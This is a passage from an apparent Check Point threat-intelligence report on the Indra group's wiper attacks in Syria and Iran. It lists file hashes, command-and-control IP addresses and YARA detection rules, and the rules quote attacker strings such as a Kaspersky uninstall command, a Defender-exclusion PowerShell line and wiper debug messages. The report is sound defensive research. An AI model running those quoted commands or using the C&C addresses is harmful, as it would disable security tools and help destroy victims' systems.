b4fed320516ae5f64bb1e02890e866e0533ee649,\r\n62a984981d14b562939294df9e479ac0d65dfc412d0449114ccb2a0bc93769b0\r\n877a992716d13e47a52f4cdf00e51c02, ca942726a3b262b98a5fddb1b2e4734246cdf9cf,\r\n2872da0355c441cedba1e5f811e99b56ea5517fe86fdebb4e579a49baf0bdee0\r\n5d70cc279156c425101e51bfa92e61ea, ae4bb25557eaca1ce03ec392b27d2afb712c815a,\r\n3099deb8c06fb8d188863f0c861de0c5bef657abdb9920ab501d9e165e495381\r\n73b0bca9d0dfb45492475f39ab54b735, 86194d936776050ca4d7f1236badc9df872122f6,\r\n571468214c11e5c76ae524b730b26b02872d8987cc67ce2d7faaabeceb1f5e52\r\n2be09527a2acc1906a4f77d42cae315c, 2dabc8a869dced67b9ce6308628441f826b17daf,\r\n5cd6e3e2c2c7313de5acc5b9a4ca4a7680b0d667951627038e5df348f61aacea\r\n86faa0db58b4443270c505e561b77eb5, c304aed1735814c4614f5367cb12e9f89ce00a99,\r\n8929380c7ea52659e0f7cacfde2e01011b9fb895db0e52cea388db901e1e668f\r\n3cba53cda9ace7ab1a7beeb0f401047d, 0a725efee682999a2a27a827f7abd19b85fdbf27,\r\n78a8134a53fa2c541dcc8fbb8a122addf0f855a86dd041bd75ff845c34e43913\r\n20db704469ae59c75a76cf36c84e8d9f, ec65cd56f5c79df62c01ae16e474d8d218f2e957,\r\n948febaab71727217303e0aabb9126f242aa51f89caa7f070a3da76c4f5699ed\r\n1d9ae3af3503a087a4f942cacf2a7b75, 706918a9a551e506333fc84e89189b126bff6fd1,\r\n74cdb71236c63343428ed61d578a0d048fa9ec46929413726542e2f7e02311ce\r\n6f78d83ef0471cc783e29d8051e24f67, 08727eb2ebcd8e46aff094c611e806df3dba20f9,\r\n5553ba3dc141cd63878a7f9f0a0e67fb7e887010c0614efd97bbc6c0be9ec2ad\r\n1551eaf7f1935ec3bcbde64f09c77d4c, b84a60f800bbd06e778ffc09e28abe38b3573903,\r\n22627df09a7d68e99f4682d9442755de38c71f53af22c80f92def91823af1466\r\nbab43b4e0df5b64ab0f053c813497610, 03e6a0b9afe4346ff0e5bc2c3a4ff05e6a4eb6bd,\r\n341e5d7fab4e6b5a16ab2c5b506d00e49b1b3aa214fb930a371637a1813382c6\r\nhttps://research.checkpoint.com/2021/indra-hackers-behind-recent-attacks-on-iran/\r\nPage 18 of 35\n\n4c1636d7036a9b4bfea421b25f73691e, 40faadf37fc6bace3a304f572b1f2892e8147820,\r\n342fb340dc518faa5811d2b9701f83a14d409310da32e0b8c451a85200e08832\r\ndb07dd687b32c50a0aa51359fb8cce09, 8249491393ffe07ffb3f987e8199f889579d0826,\r\n68e95a3ccde3ea22b8eb8adcf0ad53c7993b2ea5316948e31d9eadd11b5151d7\r\ncfb7b988cc5dc257987635646e86172b, dd01819d9ce6853927c000cc8de598d8030ab27c,\r\n38a419cd9456e40961c781e16ceee99d970be4e9235ccce0b316efe68aba3933\r\n26f49957eaa56a82ad20492919cc6c22, d7e2e40825e262e4bb884111d7ba13fd867c3c0f,\r\n4d994b864d785abccef829d84f91d949562d0af934114b65056315bf59c1ef58\r\n81d3fcbe0dca0f47f780fcf22ebb3f5e, 8531d06c2cc36af8f65f558932e2c09dec4fa3e4,\r\n2d35bb7c02062ff2fba4424a267c5c83351405281a1870f52d02f3712a547a22\r\nd85a211793e9cb1cb8c24be22c24b30f, 1b90dafc4a34491f64e62d63c82f1b44ca138887,\r\n67920ff26a18308084679186e18dcaa5f8af997c7036ba43c2e8c69ce24b9a1a\r\neef87eea468b7ac6055b49dafc86502f, 75bb2bb1ea3cd4b726f5a1bc4fab20edbeb08238,\r\nac7dd1048e1705e07e4d21dc25c58441f9eb86b37b9969b423ff6ca241871586\r\n29adef27d040405cd22d5b36aae3e00f, db82ef80f28bdca0821a616a1ba8db1d79287a67,\r\ne9b70bf93f1b396be02feb35af5445985e3429461b195de881e0483361e57049\r\n6833338cc5a96826cef926703753f10e, 62f36c0eba49ee73d8751e721fdd0acb61ef1304,\r\n342070940aa3b46486cb458eb13545101b49d4eebe2c93c608948dbb7ce463bc\r\nbfb51ec459eaafb7a50ee646d49ecd4d, 579330d75f5fce52b1bab475bd77cf347fc404e4,\r\nf8139c0f5bab5d7b1624f1ac55e84d451fe1fa01f2903f269f56e5bfa3a40548\r\nmd5,sha1,sha256 Executables: 5e3e9ac6e280d8f7fa0e29707d32ce63,\r\n6dc64e916faaf7cb26c7019e3d1e9c423550e2bd,\r\n6709d332fbd5cde1d8e5b0373b6ff70c85fee73bd911ab3f1232bb5db9242dd4\r\n685632a50d8c514a09882f24165741c3, 864667b969b7b31e8975700c4e9236390a250118,\r\nd71cc6337efb5cbbb400d57c8fdeb48d7af12a292fa87a55e8705d18b09f516e\r\n04633656756847a79c7a2a02d62e5522, 86e4f73c384d84b6ecd5ad9d7658c1cc575b54df,\r\n2aa6e42cb33ec3c132ffce425a92dfdb5e29d8ac112631aec068c8a78314d49b\r\nbd5acbbfc5c2c8b284ec389207af5759, c71b6cd6a46494e9132da20a6bacfe0b870a460e,\r\n9b0f724459637cec5e9576c8332bca16abda6ac3fbbde6f7956bc3a97a423473 Other Artifacts:\r\naad0e2a996a0b1602f5716f1b9615631, acc58db9a430be2a385d046634b26c5f88b839a0,\r\n7ad16dab6f066ec559e11ead2d9da8755d03273b1c5d374a3f59dd421c417f5a\r\nf034755abb5ba85c7d24660668f8e710, b3f5cc0288dce893cb5b4716f30b535e862dd3e6,\r\n0f941dea21337420610164da04fa2c3c929b2685363e79e5b70818cd43b3aa13\r\n8420afcab941d1fdf78acd1795c7119a, b21bde15f12e30f9b8c167716da2d3d46c33f71b,\r\nb75a962528123df9d773baa86215d9b9c6d0b85bf8364e4e553d7b64a4a9f532\r\ne1cd6d256f1eb0670f3149f5beb56ee6, 296c1c077d00eeca273fdb8bd3dc79fd32ed20b4,\r\nhttps://research.checkpoint.com/2021/indra-hackers-behind-recent-attacks-on-iran/\r\nPage 19 of 35\n\neb5237d56c0467b5def9a92e445e34eeed9af2fee28f3a2d2600363724d6f8b0\r\n8c14e57367fa096afebb94260301ed48, b4fed320516ae5f64bb1e02890e866e0533ee649,\r\n62a984981d14b562939294df9e479ac0d65dfc412d0449114ccb2a0bc93769b0\r\n877a992716d13e47a52f4cdf00e51c02, ca942726a3b262b98a5fddb1b2e4734246cdf9cf,\r\n2872da0355c441cedba1e5f811e99b56ea5517fe86fdebb4e579a49baf0bdee0\r\n5d70cc279156c425101e51bfa92e61ea, ae4bb25557eaca1ce03ec392b27d2afb712c815a,\r\n3099deb8c06fb8d188863f0c861de0c5bef657abdb9920ab501d9e165e495381\r\n73b0bca9d0dfb45492475f39ab54b735, 86194d936776050ca4d7f1236badc9df872122f6,\r\n571468214c11e5c76ae524b730b26b02872d8987cc67ce2d7faaabeceb1f5e52\r\n2be09527a2acc1906a4f77d42cae315c, 2dabc8a869dced67b9ce6308628441f826b17daf,\r\n5cd6e3e2c2c7313de5acc5b9a4ca4a7680b0d667951627038e5df348f61aacea\r\n86faa0db58b4443270c505e561b77eb5, c304aed1735814c4614f5367cb12e9f89ce00a99,\r\n8929380c7ea52659e0f7cacfde2e01011b9fb895db0e52cea388db901e1e668f\r\n3cba53cda9ace7ab1a7beeb0f401047d, 0a725efee682999a2a27a827f7abd19b85fdbf27,\r\n78a8134a53fa2c541dcc8fbb8a122addf0f855a86dd041bd75ff845c34e43913\r\n20db704469ae59c75a76cf36c84e8d9f, ec65cd56f5c79df62c01ae16e474d8d218f2e957,\r\n948febaab71727217303e0aabb9126f242aa51f89caa7f070a3da76c4f5699ed 1d9ae3af3503a087a4f942cacf2a7b75,\r\n706918a9a551e506333fc84e89189b126bff6fd1,\r\n74cdb71236c63343428ed61d578a0d048fa9ec46929413726542e2f7e02311ce\r\n6f78d83ef0471cc783e29d8051e24f67, 08727eb2ebcd8e46aff094c611e806df3dba20f9,\r\n5553ba3dc141cd63878a7f9f0a0e67fb7e887010c0614efd97bbc6c0be9ec2ad\r\n1551eaf7f1935ec3bcbde64f09c77d4c, b84a60f800bbd06e778ffc09e28abe38b3573903,\r\n22627df09a7d68e99f4682d9442755de38c71f53af22c80f92def91823af1466\r\nbab43b4e0df5b64ab0f053c813497610, 03e6a0b9afe4346ff0e5bc2c3a4ff05e6a4eb6bd,\r\n341e5d7fab4e6b5a16ab2c5b506d00e49b1b3aa214fb930a371637a1813382c6\r\n4c1636d7036a9b4bfea421b25f73691e, 40faadf37fc6bace3a304f572b1f2892e8147820,\r\n342fb340dc518faa5811d2b9701f83a14d409310da32e0b8c451a85200e08832\r\ndb07dd687b32c50a0aa51359fb8cce09, 8249491393ffe07ffb3f987e8199f889579d0826,\r\n68e95a3ccde3ea22b8eb8adcf0ad53c7993b2ea5316948e31d9eadd11b5151d7\r\ncfb7b988cc5dc257987635646e86172b, dd01819d9ce6853927c000cc8de598d8030ab27c,\r\n38a419cd9456e40961c781e16ceee99d970be4e9235ccce0b316efe68aba3933\r\n26f49957eaa56a82ad20492919cc6c22, d7e2e40825e262e4bb884111d7ba13fd867c3c0f,\r\n4d994b864d785abccef829d84f91d949562d0af934114b65056315bf59c1ef58 81d3fcbe0dca0f47f780fcf22ebb3f5e,\r\n8531d06c2cc36af8f65f558932e2c09dec4fa3e4,\r\n2d35bb7c02062ff2fba4424a267c5c83351405281a1870f52d02f3712a547a22\r\nd85a211793e9cb1cb8c24be22c24b30f, 1b90dafc4a34491f64e62d63c82f1b44ca138887,\r\n67920ff26a18308084679186e18dcaa5f8af997c7036ba43c2e8c69ce24b9a1a\r\neef87eea468b7ac6055b49dafc86502f, 75bb2bb1ea3cd4b726f5a1bc4fab20edbeb08238,\r\nac7dd1048e1705e07e4d21dc25c58441f9eb86b37b9969b423ff6ca241871586\r\n29adef27d040405cd22d5b36aae3e00f, db82ef80f28bdca0821a616a1ba8db1d79287a67,\r\ne9b70bf93f1b396be02feb35af5445985e3429461b195de881e0483361e57049\r\n6833338cc5a96826cef926703753f10e, 62f36c0eba49ee73d8751e721fdd0acb61ef1304,\r\nhttps://research.checkpoint.com/2021/indra-hackers-behind-recent-attacks-on-iran/\r\nPage 20 of 35\n\n342070940aa3b46486cb458eb13545101b49d4eebe2c93c608948dbb7ce463bc\r\nbfb51ec459eaafb7a50ee646d49ecd4d, 579330d75f5fce52b1bab475bd77cf347fc404e4,\r\nf8139c0f5bab5d7b1624f1ac55e84d451fe1fa01f2903f269f56e5bfa3a40548\r\nmd5,sha1,sha256\r\nExecutables:\r\n5e3e9ac6e280d8f7fa0e29707d32ce63, 6dc64e916faaf7cb26c7019e3d1e9c423550e2bd, 6709d332fbd5cde1d8e5b0373\r\n685632a50d8c514a09882f24165741c3, 864667b969b7b31e8975700c4e9236390a250118, d71cc6337efb5cbbb400d57c8\r\n04633656756847a79c7a2a02d62e5522, 86e4f73c384d84b6ecd5ad9d7658c1cc575b54df, 2aa6e42cb33ec3c132ffce425\r\nbd5acbbfc5c2c8b284ec389207af5759, c71b6cd6a46494e9132da20a6bacfe0b870a460e, 9b0f724459637cec5e9576c83\r\nOther Artifacts:\r\naad0e2a996a0b1602f5716f1b9615631, acc58db9a430be2a385d046634b26c5f88b839a0, 7ad16dab6f066ec559e11ead2\r\nf034755abb5ba85c7d24660668f8e710, b3f5cc0288dce893cb5b4716f30b535e862dd3e6, 0f941dea21337420610164da0\r\n8420afcab941d1fdf78acd1795c7119a, b21bde15f12e30f9b8c167716da2d3d46c33f71b, b75a962528123df9d773baa86\r\ne1cd6d256f1eb0670f3149f5beb56ee6, 296c1c077d00eeca273fdb8bd3dc79fd32ed20b4, eb5237d56c0467b5def9a92e4\r\n8c14e57367fa096afebb94260301ed48, b4fed320516ae5f64bb1e02890e866e0533ee649, 62a984981d14b562939294df9\r\n877a992716d13e47a52f4cdf00e51c02, ca942726a3b262b98a5fddb1b2e4734246cdf9cf, 2872da0355c441cedba1e5f81\r\n5d70cc279156c425101e51bfa92e61ea, ae4bb25557eaca1ce03ec392b27d2afb712c815a, 3099deb8c06fb8d188863f0c8\r\n73b0bca9d0dfb45492475f39ab54b735, 86194d936776050ca4d7f1236badc9df872122f6, 571468214c11e5c76ae524b73\r\n2be09527a2acc1906a4f77d42cae315c, 2dabc8a869dced67b9ce6308628441f826b17daf, 5cd6e3e2c2c7313de5acc5b9a\r\n86faa0db58b4443270c505e561b77eb5, c304aed1735814c4614f5367cb12e9f89ce00a99, 8929380c7ea52659e0f7cacfd\r\n3cba53cda9ace7ab1a7beeb0f401047d, 0a725efee682999a2a27a827f7abd19b85fdbf27, 78a8134a53fa2c541dcc8fbb8\r\n20db704469ae59c75a76cf36c84e8d9f, ec65cd56f5c79df62c01ae16e474d8d218f2e957, 948febaab71727217303e0aab\r\n1d9ae3af3503a087a4f942cacf2a7b75, 706918a9a551e506333fc84e89189b126bff6fd1, 74cdb71236c63343428ed61d5\r\n6f78d83ef0471cc783e29d8051e24f67, 08727eb2ebcd8e46aff094c611e806df3dba20f9, 5553ba3dc141cd63878a7f9f0\r\n1551eaf7f1935ec3bcbde64f09c77d4c, b84a60f800bbd06e778ffc09e28abe38b3573903, 22627df09a7d68e99f4682d94\r\nbab43b4e0df5b64ab0f053c813497610, 03e6a0b9afe4346ff0e5bc2c3a4ff05e6a4eb6bd, 341e5d7fab4e6b5a16ab2c5b5\r\n4c1636d7036a9b4bfea421b25f73691e, 40faadf37fc6bace3a304f572b1f2892e8147820, 342fb340dc518faa5811d2b97\r\ndb07dd687b32c50a0aa51359fb8cce09, 8249491393ffe07ffb3f987e8199f889579d0826, 68e95a3ccde3ea22b8eb8adcf\r\ncfb7b988cc5dc257987635646e86172b, dd01819d9ce6853927c000cc8de598d8030ab27c, 38a419cd9456e40961c781e16\r\n26f49957eaa56a82ad20492919cc6c22, d7e2e40825e262e4bb884111d7ba13fd867c3c0f, 4d994b864d785abccef829d84\r\n81d3fcbe0dca0f47f780fcf22ebb3f5e, 8531d06c2cc36af8f65f558932e2c09dec4fa3e4, 2d35bb7c02062ff2fba4424a2\r\nd85a211793e9cb1cb8c24be22c24b30f, 1b90dafc4a34491f64e62d63c82f1b44ca138887, 67920ff26a18308084679186e\r\neef87eea468b7ac6055b49dafc86502f, 75bb2bb1ea3cd4b726f5a1bc4fab20edbeb08238, ac7dd1048e1705e07e4d21dc2\r\n29adef27d040405cd22d5b36aae3e00f, db82ef80f28bdca0821a616a1ba8db1d79287a67, e9b70bf93f1b396be02feb35a\r\n6833338cc5a96826cef926703753f10e, 62f36c0eba49ee73d8751e721fdd0acb61ef1304, 342070940aa3b46486cb458eb\r\nbfb51ec459eaafb7a50ee646d49ecd4d, 579330d75f5fce52b1bab475bd77cf347fc404e4, f8139c0f5bab5d7b1624f1ac5\r\nC\u0026C servers:\r\n68.183.79.77 167.172.177.158 139.59.89.238 172.105.42.64\r\n68.183.79.77\r\n167.172.177.158\r\nhttps://research.checkpoint.com/2021/indra-hackers-behind-recent-attacks-on-iran/\r\nPage 21 of 35\n\n139.59.89.238\r\n172.105.42.64\r\nAppendix B – Yara Rules\r\nrule ZZ_breakwin_config {\r\ndescription = \"Detects the header of the encrypted config files, assuming known encryption key.\"\r\nauthor = \"Check Point Research\"\r\nhash = \"948febaab71727217303e0aabb9126f242aa51f89caa7f070a3da76c4f5699ed\"\r\nhash = \"2d35bb7c02062ff2fba4424a267c5c83351405281a1870f52d02f3712a547a22\"\r\nhash = \"68e95a3ccde3ea22b8eb8adcf0ad53c7993b2ea5316948e31d9eadd11b5151d7\"\r\n$conf_header = {1A 69 45 47 5E 46 4A 06 03 E4 34 0B 06 1D ED 2F 02 15 02 E5 57 4D 59 59 D1 40 20 22}\r\ndescription = \"Detects the BreakWin wiper that was used in attacks in Syria\"\r\nauthor = \"Check Point Research\"\r\nhash = \"2aa6e42cb33ec3c132ffce425a92dfdb5e29d8ac112631aec068c8a78314d49b\"\r\nhash = \"6709d332fbd5cde1d8e5b0373b6ff70c85fee73bd911ab3f1232bb5db9242dd4\"\r\nhash = \"d71cc6337efb5cbbb400d57c8fdeb48d7af12a292fa87a55e8705d18b09f516e\"\r\n$debug_str_meteor_1 = \"the program received an invalid number of arguments\" wide\r\n$debug_str_meteor_2 = \"End interval logger. Resuming writing every log\" wide\r\n$debug_str_meteor_0 = \"failed to initialize configuration from file\" wide\r\n$debug_str_meteor_3 = \"Meteor is still alive.\" wide\r\n$debug_str_meteor_4 = \"Exiting main function because of some error\" wide\r\n$debug_str_meteor_5 = \"Meteor has finished. This shouldn't be possible because of the is-alive loop.\" wide\r\n$debug_str_meteor_6 = \"Meteor has started.\" wide\r\n$debug_str_meteor_7 = \"Could not hide current console.\" wide\r\n$debug_str_meteor_8 = \"Could not get the window handle used by the console.\" wide\r\n$debug_str_meteor_9 = \"Failed to find base-64 data size\" wide\r\n$debug_str_meteor_10 = \"Running locker thread\" wide\r\nhttps://research.checkpoint.com/2021/indra-hackers-behind-recent-attacks-on-iran/\r\nPage 22 of 35\n\n$debug_str_meteor_11 = \"Failed to encode wide-character string as Base64\" wide\r\n$debug_str_meteor_12 = \"Wiper operation failed.\" wide\r\n$debug_str_meteor_13 = \"Screen saver disable failed.\" wide\r\n$debug_str_meteor_14 = \"Failed to generate password of length %s. Generating a default one.\" wide\r\n$debug_str_meteor_15 = \"Failed to delete boot configuration\" wide\r\n$debug_str_meteor_16 = \"Could not delete all BCD entries.\" wide\r\n$debug_str_meteor_17 = \"Finished deleting BCD entries.\" wide\r\n$debug_str_meteor_18 = \"Failed to change lock screen\" wide\r\n$debug_str_meteor_19 = \"Boot configuration deleted successfully\" wide\r\n$debug_str_meteor_20 = \"Failed to kill all winlogon processes\" wide\r\n$debug_str_meteor_21 = \"Changing passwords of all users to\" wide\r\n$debug_str_meteor_22 = \"Failed to change the passwords of all users\" wide\r\n$debug_str_meteor_23 = \"Failed to run the locker thread\" wide\r\n$debug_str_meteor_24 = \"Screen saver disabled successfully.\" wide\r\n$debug_str_meteor_25 = \"Generating random password failed\" wide\r\n$debug_str_meteor_26 = \"Locker installation failed\" wide\r\n$debug_str_meteor_27 = \"Failed to set auto logon.\" wide\r\n$debug_str_meteor_28 = \"Failed to initialize interval logger. Using a dummy logger instead.\" wide\r\n$debug_str_meteor_29 = \"Succeeded setting auto logon for\" wide\r\n$debug_str_meteor_30 = \"Failed disabling the first logon privacy settings user approval.\" wide\r\n$debug_str_meteor_31 = \"Failed disabling the first logon animation.\" wide\r\n$debug_str_meteor_32 = \"Waiting for new winlogon process\" wide\r\n$debug_str_meteor_33 = \"Failed to isolate from domain\" wide\r\n$debug_str_meteor_34 = \"Failed creating scheduled task for system with name %s.\" wide\r\n$debug_str_meteor_35 = \"Failed to get the new token of winlogon.\" wide\r\n$debug_str_meteor_36 = \"Failed adding new admin user.\" wide\r\nhttps://research.checkpoint.com/2021/indra-hackers-behind-recent-attacks-on-iran/\r\nPage 23 of 35\n\n$debug_str_meteor_37 = \"Failed changing settings for the created new user.\" wide\r\n$debug_str_meteor_38 = \"Failed disabling recovery mode.\" wide\r\n$debug_str_meteor_39 = \"Logging off users on Windows version 8 or above\" wide\r\n$debug_str_meteor_40 = \"Succeeded setting boot policy to ignore all errors.\" wide\r\n$debug_str_meteor_41 = \"Succeeded creating scheduled task for system with name\" wide\r\n$debug_str_meteor_42 = \"Succeeded disabling recovery mode\" wide\r\n$debug_str_meteor_43 = \"Failed to log off all sessions\" wide\r\n$debug_str_meteor_44 = \"Failed to delete shadowcopies.\" wide\r\n$debug_str_meteor_45 = \"Failed logging off session: \" wide\r\n$debug_str_meteor_46 = \"Failed setting boot policy to ignore all errors.\" wide\r\n$debug_str_meteor_47 = \"Successfully logged off all local sessions, except winlogon.\" wide\r\n$debug_str_meteor_48 = \"Succeeded creating scheduled task with name %s for user %s.\" wide\r\n$debug_str_meteor_49 = \"Killing all winlogon processes\" wide\r\n$debug_str_meteor_50 = \"Logging off users in Windows 7\" wide\r\n$debug_str_meteor_51 = \"Failed logging off all local sessions, except winlogon.\" wide\r\n$debug_str_meteor_52 = \"Failed creating scheduled task with name %s for user %s.\" wide\r\n$debug_str_meteor_53 = \"Succeeded deleting shadowcopies.\" wide\r\n$debug_str_meteor_54 = \"Logging off users in Windows XP\" wide\r\n$debug_str_meteor_55 = \"Failed changing settings for the created new user.\" wide\r\n$debug_str_meteor_56 = \"Could not open file %s. error message: %s\" wide\r\n$debug_str_meteor_57 = \"Could not write to file %s. error message: %s\" wide\r\n$debug_str_meteor_58 = \"tCould not tell file pointer location on file %s.\" wide\r\n$debug_str_meteor_59 = \"Could not set file pointer location on file %s to offset %s.\" wide\r\n$debug_str_meteor_60 = \"Could not read from file %s. error message: %s\" wide\r\n$debug_str_meteor_61 = \"Failed to wipe file %s\" wide\r\n$debug_str_meteor_62 = \"attempted to access encrypted file in offset %s, but it only supports offset 0\" wide\r\nhttps://research.checkpoint.com/2021/indra-hackers-behind-recent-attacks-on-iran/\r\nPage 24 of 35\n\n$debug_str_meteor_63 = \"Failed to create thread. Error message: %s\" wide\r\n$debug_str_meteor_64 = \"Failed to wipe file %s\" wide\r\n$debug_str_meteor_65 = \"failed to get configuration value with key %s\" wide\r\n$debug_str_meteor_66 = \"failed to parse the configuration from file %s\" wide\r\n$debug_str_meteor_67 = \"Failed posting to server, received unknown exception\" wide\r\n$debug_str_meteor_68 = \"Failed posting to server, received std::exception\" wide\r\n$debug_str_meteor_69 = \"Skipping %s logs. Writing log number %s:\" wide\r\n$debug_str_meteor_70 = \"Start interval logger. Writing logs with an interval of %s logs.\" wide\r\n$debug_str_meteor_71 = \"failed to write message to log file %s\" wide\r\n$debug_str_meteor_72 = \"The log message is too big: %s/%s characters.\" wide\r\n$debug_str_stardust_0 = \"Stardust has started.\" wide\r\n$debug_str_stardust_1 = \"0Vy0qMGO\" ascii wide\r\n$debug_str_comet_0 = \"Comet has started.\" wide\r\n$debug_str_comet_1 = \"Comet has finished.\" wide\r\n$str_lock_my_pc = \"Lock My PC 4\" ascii wide\r\n$config_entry_0 = \"state_path\" ascii\r\n$config_entry_1 = \"state_encryption_key\" ascii\r\n$config_entry_2 = \"log_server_port\" ascii\r\n$config_entry_3 = \"log_file_path\" ascii\r\n$config_entry_4 = \"log_encryption_key\" ascii\r\n$config_entry_5 = \"log_server_ip\" ascii\r\n$config_entry_6 = \"processes_to_kill\" ascii\r\n$config_entry_7 = \"process_termination_timeout\" ascii\r\n$config_entry_8 = \"paths_to_wipe\" ascii\r\n$config_entry_9 = \"wiping_stage_logger_interval\" ascii\r\n$config_entry_10 = \"locker_exe_path\" ascii\r\nhttps://research.checkpoint.com/2021/indra-hackers-behind-recent-attacks-on-iran/\r\nPage 25 of 35\n\n$config_entry_11 = \"locker_background_image_jpg_path\" ascii\r\n$config_entry_12 = \"auto_logon_path\" ascii\r\n$config_entry_13 = \"locker_installer_path\" ascii\r\n$config_entry_14 = \"locker_password_hash\" ascii\r\n$config_entry_15 = \"users_password\" ascii\r\n$config_entry_16 = \"locker_background_image_bmp_path\" ascii\r\n$config_entry_17 = \"locker_registry_settings_files\" ascii\r\n$config_entry_18 = \"cleanup_script_path\" ascii\r\n$config_entry_19 = \"is_alive_loop_interval\" ascii\r\n$config_entry_20 = \"cleanup_scheduled_task_name\" ascii\r\n$config_entry_21 = \"self_scheduled_task_name\" ascii\r\n$encryption_asm = {33 D2 8B C3 F7 75 E8 8B 41 04 8B 4E 04 8A 04 02 02 C3 32 04 1F 88 45 F3 39 4E 08}\r\n$random_string_generation = {33 D2 59 F7 F1 83 ?? ?? 08 66 0F BE 82 ?? ?? ?? 00 0F B7 C8 8B C7}\r\n$random_string_generation\r\nrule ZZ_breakwin_stardust_vbs {\r\ndescription = \"Detect the VBS files that where found in the attacks on targets in Syria\"\r\nauthor = \"Check Point Research\"\r\nhash = \"38a419cd9456e40961c781e16ceee99d970be4e9235ccce0b316efe68aba3933\"\r\nhash = \"62a984981d14b562939294df9e479ac0d65dfc412d0449114ccb2a0bc93769b0\"\r\nhash = \"4d994b864d785abccef829d84f91d949562d0af934114b65056315bf59c1ef58\"\r\nhash = \"eb5237d56c0467b5def9a92e445e34eeed9af2fee28f3a2d2600363724d6f8b0\"\r\nhash = \"5553ba3dc141cd63878a7f9f0a0e67fb7e887010c0614efd97bbc6c0be9ec2ad\"\r\n$url_template = \"progress.php?hn=\\\" \u0026 CN \u0026 \\\"\u0026dt=\\\" \u0026 DT \u0026 \\\"\u0026st=\"\r\n$compression_password_1 =\r\n\"YWhZMFU1VlZGdGNFNWlhMVlVMnhTMWtOVlJVWWNGTk9iVTQxVW10V0ZFeFJUMD0r\"\r\n$compression_password_2 =\r\n\"YWlvcyBqQCNAciNxIGpmc2FkKnIoOUZURjlVSjBSRjJRSlJGODlKSDIzRmloIG8\"\r\nhttps://research.checkpoint.com/2021/indra-hackers-behind-recent-attacks-on-iran/\r\nPage 26 of 35\n\n$uninstall_kaspersky = \"Shell.Run \\\"msiexec.exe /x \\\" \u0026 productcode \u0026 \\\" KLLOGIN=\"\r\n$is_avp_running = \"isProcessRunning(\\\".\\\", \\\"avp.exe\\\") Then\"\r\nrule ZZ_breakwin_meteor_batch_files {\r\ndescription = \"Detect the batch files used in the attacks\"\r\nauthor = \"Check Point Research\"\r\n$filename_0 = \"mscap.bmp\"\r\n$filename_1 = \"mscap.jpg\"\r\n$filename_2 = \"msconf.conf\"\r\n$filename_3 = \"msmachine.reg\"\r\n$filename_4 = \"mssetup.exe\"\r\n$filename_5 = \"msuser.reg\"\r\n$filename_6 = \"msapp.exe\"\r\n$filename_9 = \"msrun.bat\"\r\n$command_line_0 = \"powershell -Command \\\"%exclude_command% '%defender_exclusion_folder%\"\r\n$command_line_1 = \"start /b \\\"\\\" update.bat hackemall\"\r\nrule ZZ_breakwin_config { meta: description = \"Detects the header of the encrypted config files, assuming known\r\nencryption key.\" author = \"Check Point Research\" date = \"22-07-2021\" hash =\r\n\"948febaab71727217303e0aabb9126f242aa51f89caa7f070a3da76c4f5699ed\" hash =\r\n\"2d35bb7c02062ff2fba4424a267c5c83351405281a1870f52d02f3712a547a22\" hash =\r\n\"68e95a3ccde3ea22b8eb8adcf0ad53c7993b2ea5316948e31d9eadd11b5151d7\" strings: $conf_header = {1A 69 45\r\n47 5E 46 4A 06 03 E4 34 0B 06 1D ED 2F 02 15 02 E5 57 4D 59 59 D1 40 20 22} condition: $conf_header at 0 }\r\nrule ZZ_breakwin_wiper { meta: description = \"Detects the BreakWin wiper that was used in attacks in Syria\"\r\nauthor = \"Check Point Research\" date = \"22-07-2021\" hash =\r\n\"2aa6e42cb33ec3c132ffce425a92dfdb5e29d8ac112631aec068c8a78314d49b\" hash =\r\n\"6709d332fbd5cde1d8e5b0373b6ff70c85fee73bd911ab3f1232bb5db9242dd4\" hash =\r\n\"d71cc6337efb5cbbb400d57c8fdeb48d7af12a292fa87a55e8705d18b09f516e\" strings: $debug_str_meteor_1 =\r\n\"the program received an invalid number of arguments\" wide $debug_str_meteor_2 = \"End interval logger.\r\nResuming writing every log\" wide $debug_str_meteor_0 = \"failed to initialize configuration from file\" wide\r\n$debug_str_meteor_3 = \"Meteor is still alive.\" wide $debug_str_meteor_4 = \"Exiting main function because of\r\nsome error\" wide $debug_str_meteor_5 = \"Meteor has finished. This shouldn't be possible because of the is-alive\r\nloop.\" wide $debug_str_meteor_6 = \"Meteor has started.\" wide $debug_str_meteor_7 = \"Could not hide current\r\nconsole.\" wide $debug_str_meteor_8 = \"Could not get the window handle used by the console.\" wide\r\n$debug_str_meteor_9 = \"Failed to find base-64 data size\" wide $debug_str_meteor_10 = \"Running locker thread\"\r\nhttps://research.checkpoint.com/2021/indra-hackers-behind-recent-attacks-on-iran/\r\nPage 27 of 35\n\nwide $debug_str_meteor_11 = \"Failed to encode wide-character string as Base64\" wide $debug_str_meteor_12 =\r\n\"Wiper operation failed.\" wide $debug_str_meteor_13 = \"Screen saver disable failed.\" wide\r\n$debug_str_meteor_14 = \"Failed to generate password of length %s. Generating a default one.\" wide\r\n$debug_str_meteor_15 = \"Failed to delete boot configuration\" wide $debug_str_meteor_16 = \"Could not delete all\r\nBCD entries.\" wide $debug_str_meteor_17 = \"Finished deleting BCD entries.\" wide $debug_str_meteor_18 =\r\n\"Failed to change lock screen\" wide $debug_str_meteor_19 = \"Boot configuration deleted successfully\" wide\r\n$debug_str_meteor_20 = \"Failed to kill all winlogon processes\" wide $debug_str_meteor_21 = \"Changing\r\npasswords of all users to\" wide $debug_str_meteor_22 = \"Failed to change the passwords of all users\" wide\r\n$debug_str_meteor_23 = \"Failed to run the locker thread\" wide $debug_str_meteor_24 = \"Screen saver disabled\r\nsuccessfully.\" wide $debug_str_meteor_25 = \"Generating random password failed\" wide $debug_str_meteor_26 =\r\n\"Locker installation failed\" wide $debug_str_meteor_27 = \"Failed to set auto logon.\" wide $debug_str_meteor_28\r\n= \"Failed to initialize interval logger. Using a dummy logger instead.\" wide $debug_str_meteor_29 = \"Succeeded\r\nsetting auto logon for\" wide $debug_str_meteor_30 = \"Failed disabling the first logon privacy settings user\r\napproval.\" wide $debug_str_meteor_31 = \"Failed disabling the first logon animation.\" wide\r\n$debug_str_meteor_32 = \"Waiting for new winlogon process\" wide $debug_str_meteor_33 = \"Failed to isolate\r\nfrom domain\" wide $debug_str_meteor_34 = \"Failed creating scheduled task for system with name %s.\" wide\r\n$debug_str_meteor_35 = \"Failed to get the new token of winlogon.\" wide $debug_str_meteor_36 = \"Failed adding\r\nnew admin user.\" wide $debug_str_meteor_37 = \"Failed changing settings for the created new user.\" wide\r\n$debug_str_meteor_38 = \"Failed disabling recovery mode.\" wide $debug_str_meteor_39 = \"Logging off users on\r\nWindows version 8 or above\" wide 